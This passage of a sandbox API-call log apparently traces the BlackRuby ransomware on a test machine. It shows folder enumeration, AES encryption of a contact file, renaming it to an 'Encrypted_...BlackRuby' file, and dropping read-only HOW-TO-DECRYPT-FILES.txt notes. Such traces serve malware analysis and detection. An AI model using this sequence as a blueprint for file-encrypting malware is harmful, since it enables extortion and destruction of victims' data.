0x12 [0048.605] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.605] GetLastError () returned 0x12 [0048.605] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.605] SetErrorMode (uMode=0x0) returned 0x1 [0048.605] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", lpFilePart=0x0) returned 0x52 [0048.605] GetLastError () returned 0x12 [0048.605] SetErrorMode (uMode=0x1) returned 0x0 [0048.606] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.606] GetLastError () returned 0x12 [0048.606] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.606] GetLastError () returned 0x12 [0048.606] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.606] GetLastError () returned 0x12 [0048.606] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.606] SetErrorMode (uMode=0x0) returned 0x1 [0048.606] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2a [0048.606] GetLastError () returned 0x12 [0048.606] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Application Data", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Application Data", lpFilePart=0x0) returned 0x21 [0048.606] GetLastError () returned 0x12 [0048.606] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.606] GetLastError () returned 0x12 [0048.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.606] GetLastError () returned 0x12 [0048.606] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Application Data", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Application Data", lpFilePart=0x0) returned 0x21 [0048.606] GetLastError () returned 0x12 [0048.606] SetErrorMode (uMode=0x1) returned 0x0 [0048.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.607] GetLastError () returned 0x5 [0048.608] SetErrorMode (uMode=0x0) returned 0x1 [0048.608] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts", lpFilePart=0x0) returned 0x19 [0048.608] GetLastError () returned 0x5 [0048.608] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.608] GetLastError () returned 0x5 [0048.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.608] GetLastError () returned 0x5 [0048.608] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts", lpFilePart=0x0) returned 0x19 [0048.608] GetLastError () returned 0x5 [0048.608] SetErrorMode (uMode=0x1) returned 0x0 [0048.608] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.608] GetLastError () returned 0x5 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.609] GetLastError () returned 0x5 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.609] GetLastError () returned 0x5 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.609] GetLastError () returned 0x5 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.609] GetLastError () returned 0x12 [0048.609] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.609] SetErrorMode (uMode=0x0) returned 0x1 [0048.609] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts", lpFilePart=0x0) returned 0x19 [0048.609] GetLastError () returned 0x12 [0048.609] SetErrorMode (uMode=0x1) returned 0x0 [0048.609] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.609] GetLastError () returned 0x12 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.609] GetLastError () returned 0x12 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.609] GetLastError () returned 0x12 [0048.609] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.609] GetLastError () returned 0x12 [0048.610] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.610] GetLastError () returned 0x12 [0048.610] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.610] SetErrorMode (uMode=0x0) returned 0x1 [0048.610] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0048.610] GetLastError () returned 0x12 [0048.610] SetErrorMode (uMode=0x1) returned 0x0 [0048.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x1b49cdc | out: lpFileInformation=0x1b49cdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0048.610] GetLastError () returned 0x12 [0048.610] SetErrorMode (uMode=0x0) returned 0x1 [0048.610] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0048.611] GetLastError () returned 0x12 [0048.611] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0048.611] GetLastError () returned 0x12 [0048.611] SetErrorMode (uMode=0x1) returned 0x0 [0048.611] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.611] GetLastError () returned 0x0 [0048.611] GetFileType (hFile=0x184) returned 0x1 [0048.611] SetErrorMode (uMode=0x0) returned 0x1 [0048.611] GetFileType (hFile=0x184) returned 0x1 [0048.611] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x10b1e [0048.611] GetLastError () returned 0x0 [0048.611] ReadFile (in: hFile=0x184, lpBuffer=0x1b4ba58, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b4ba58*, lpNumberOfBytesRead=0x18ed84*=0x10b1e, lpOverlapped=0x0) returned 1 [0048.624] GetLastError () returned 0x0 [0048.624] CloseHandle (hObject=0x184) returned 1 [0048.624] GetLastError () returned 0x0 [0048.624] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0048.624] GetLastError () returned 0x0 [0048.624] SetErrorMode (uMode=0x1) returned 0x0 [0048.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0048.624] GetLastError () returned 0x0 [0048.624] SetErrorMode (uMode=0x0) returned 0x1 [0048.624] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0048.624] GetLastError () returned 0x0 [0048.656] CryptImportKey (in: hProv=0x37c708, pbData=0x1bc7460, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0048.656] GetLastError () returned 0x0 [0048.656] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.656] GetLastError () returned 0x0 [0048.661] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.661] GetLastError () returned 0x0 [0048.661] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0048.661] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.661] GetLastError () returned 0x0 [0048.661] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bf44ac*=0x1, dwFlags=0x0) returned 1 [0048.661] GetLastError () returned 0x0 [0048.661] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bf4478, dwFlags=0x0) returned 1 [0048.661] GetLastError () returned 0x0 [0048.661] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf44f4*, pdwDataLen=0x18ed74*=0x10c10, dwBufLen=0x10c10 | out: pbData=0x1bf44f4*, pdwDataLen=0x18ed74*=0x10c10) returned 1 [0048.662] GetLastError () returned 0x0 [0048.662] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c15d40*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c15d40*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0048.662] GetLastError () returned 0x0 [0048.662] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c15d70*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c15d70*, pdwDataLen=0x18ed94*=0x10) returned 1 [0048.662] GetLastError () returned 0x0 [0048.663] CryptDestroyKey (hKey=0x360a20) returned 1 [0048.663] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.663] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.663] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0048.663] GetLastError () returned 0x0 [0048.663] SetErrorMode (uMode=0x1) returned 0x0 [0048.663] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.664] GetLastError () returned 0xb7 [0048.664] GetFileType (hFile=0x184) returned 0x1 [0048.664] SetErrorMode (uMode=0x0) returned 0x1 [0048.664] GetFileType (hFile=0x184) returned 0x1 [0048.667] CloseHandle (hObject=0x184) returned 1 [0048.667] GetLastError () returned 0xb7 [0048.667] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0048.667] GetLastError () returned 0xb7 [0048.667] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\Encrypted_OOkar1uRIbdnSiBGhysS6y1nKtz1QWhPV40xRV.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\Encrypted_OOkar1uRIbdnSiBGhysS6y1nKtz1QWhPV40xRV.BlackRuby", lpFilePart=0x0) returned 0x54 [0048.667] GetLastError () returned 0xb7 [0048.667] SetErrorMode (uMode=0x1) returned 0x0 [0048.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2535f360, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10c20)) returned 1 [0048.667] GetLastError () returned 0xb7 [0048.667] SetErrorMode (uMode=0x0) returned 0x1 [0048.667] MoveFileW (lpExistingFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\Default\\Contacts\\Encrypted_OOkar1uRIbdnSiBGhysS6y1nKtz1QWhPV40xRV.BlackRuby" (normalized: "c:\\users\\default\\contacts\\encrypted_ookar1uribdnsibghyss6y1nktz1qwhpv40xrv.blackruby")) returned 1 [0048.667] GetLastError () returned 0xb7 [0048.668] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0048.668] GetLastError () returned 0xb7 [0048.668] SetErrorMode (uMode=0x1) returned 0x0 [0048.668] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.668] GetLastError () returned 0x0 [0048.668] GetFileType (hFile=0x184) returned 0x1 [0048.668] SetErrorMode (uMode=0x0) returned 0x1 [0048.668] GetFileType (hFile=0x184) returned 0x1 [0048.670] CloseHandle (hObject=0x184) returned 1 [0048.670] GetLastError () returned 0x0 [0048.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0048.670] GetLastError () returned 0x0 [0048.670] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.670] GetLastError () returned 0x0 [0048.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\desktop.ini", lpFilePart=0x0) returned 0x25 [0048.670] GetLastError () returned 0x0 [0048.670] SetErrorMode (uMode=0x1) returned 0x0 [0048.670] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c4373c | out: lpFileInformation=0x1c4373c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c82b40, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0048.670] GetLastError () returned 0x0 [0048.670] SetErrorMode (uMode=0x0) returned 0x1 [0048.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0048.671] GetLastError () returned 0x0 [0048.671] SetErrorMode (uMode=0x1) returned 0x0 [0048.671] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.671] GetLastError () returned 0x5 [0048.671] SetErrorMode (uMode=0x0) returned 0x1 [0048.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Cookies", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Cookies", lpFilePart=0x0) returned 0x18 [0048.672] GetLastError () returned 0x5 [0048.672] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.672] GetLastError () returned 0x5 [0048.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.672] GetLastError () returned 0x5 [0048.672] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Cookies", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Cookies", lpFilePart=0x0) returned 0x18 [0048.672] GetLastError () returned 0x5 [0048.672] SetErrorMode (uMode=0x1) returned 0x0 [0048.672] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.672] GetLastError () returned 0x5 [0048.674] SetErrorMode (uMode=0x0) returned 0x1 [0048.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Desktop", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Desktop", lpFilePart=0x0) returned 0x18 [0048.674] GetLastError () returned 0x5 [0048.674] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.674] GetLastError () returned 0x5 [0048.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.674] GetLastError () returned 0x5 [0048.674] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Desktop", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Desktop", lpFilePart=0x0) returned 0x18 [0048.674] GetLastError () returned 0x5 [0048.674] SetErrorMode (uMode=0x1) returned 0x0 [0048.674] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.674] GetLastError () returned 0x5 [0048.674] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.674] GetLastError () returned 0x5 [0048.675] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.675] GetLastError () returned 0x5 [0048.675] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.675] GetLastError () returned 0x12 [0048.675] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.675] SetErrorMode (uMode=0x0) returned 0x1 [0048.675] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Desktop", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Desktop", lpFilePart=0x0) returned 0x18 [0048.675] GetLastError () returned 0x12 [0048.675] SetErrorMode (uMode=0x1) returned 0x0 [0048.675] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.675] GetLastError () returned 0x12 [0048.675] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.675] GetLastError () returned 0x12 [0048.675] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.676] GetLastError () returned 0x12 [0048.676] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.676] GetLastError () returned 0x12 [0048.676] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.676] SetErrorMode (uMode=0x0) returned 0x1 [0048.676] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Desktop\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Desktop\\desktop.ini", lpFilePart=0x0) returned 0x24 [0048.676] GetLastError () returned 0x12 [0048.676] SetErrorMode (uMode=0x1) returned 0x0 [0048.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c63330 | out: lpFileInformation=0x1c63330*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c82b40, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0048.676] GetLastError () returned 0x12 [0048.676] SetErrorMode (uMode=0x0) returned 0x1 [0048.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0048.677] GetLastError () returned 0x12 [0048.677] SetErrorMode (uMode=0x1) returned 0x0 [0048.677] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.677] GetLastError () returned 0x0 [0048.677] GetFileType (hFile=0x184) returned 0x1 [0048.678] SetErrorMode (uMode=0x0) returned 0x1 [0048.678] GetFileType (hFile=0x184) returned 0x1 [0048.678] WriteFile (in: hFile=0x184, lpBuffer=0x1c7f1dc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c7f1dc*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.678] GetLastError () returned 0x0 [0048.679] CloseHandle (hObject=0x184) returned 1 [0048.679] GetLastError () returned 0x0 [0048.679] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0048.679] GetLastError () returned 0x0 [0048.679] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Desktop\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.679] GetLastError () returned 0x0 [0048.679] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents", lpFilePart=0x0) returned 0x1a [0048.679] GetLastError () returned 0x0 [0048.679] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.679] GetLastError () returned 0x0 [0048.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.679] GetLastError () returned 0x0 [0048.679] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents", lpFilePart=0x0) returned 0x1a [0048.679] GetLastError () returned 0x0 [0048.679] SetErrorMode (uMode=0x1) returned 0x0 [0048.679] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.680] GetLastError () returned 0x0 [0048.680] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.680] GetLastError () returned 0x0 [0048.680] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.680] GetLastError () returned 0x0 [0048.681] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.681] GetLastError () returned 0x0 [0048.681] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.681] GetLastError () returned 0x0 [0048.681] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.681] GetLastError () returned 0x0 [0048.681] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.681] GetLastError () returned 0x12 [0048.681] FindClose (in: 